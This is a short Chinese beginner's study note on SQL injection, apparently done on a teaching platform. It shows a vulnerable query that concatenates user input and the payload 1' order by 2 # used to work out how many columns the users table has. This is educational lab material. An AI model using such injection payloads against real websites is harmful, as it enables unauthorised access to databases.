3.sql injection之users表的字段猜解-------小白笔记
1.查看源码:
得出重要的查询语句:SELECT first_name, last_name FROM users WHERE user_id = '$id';
//但是,这个只是为了平台的教学所用,才能够可以查看源码,一般情况下,网站是不会给你看这个代码的,所以你并不知道数据库中的表有多少字段供给查询
2.使用order by猜解users表中有多少字段数
源码:SELECT first_name, last_name FROM users WHERE user_id = '$id'
构造:1' order by 2 #
执行构造的语句:select first_name,last_name from users where user_id=’1' order by 2 #’
//#起到了注释最后的系统闭合产生的单引号的作用
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!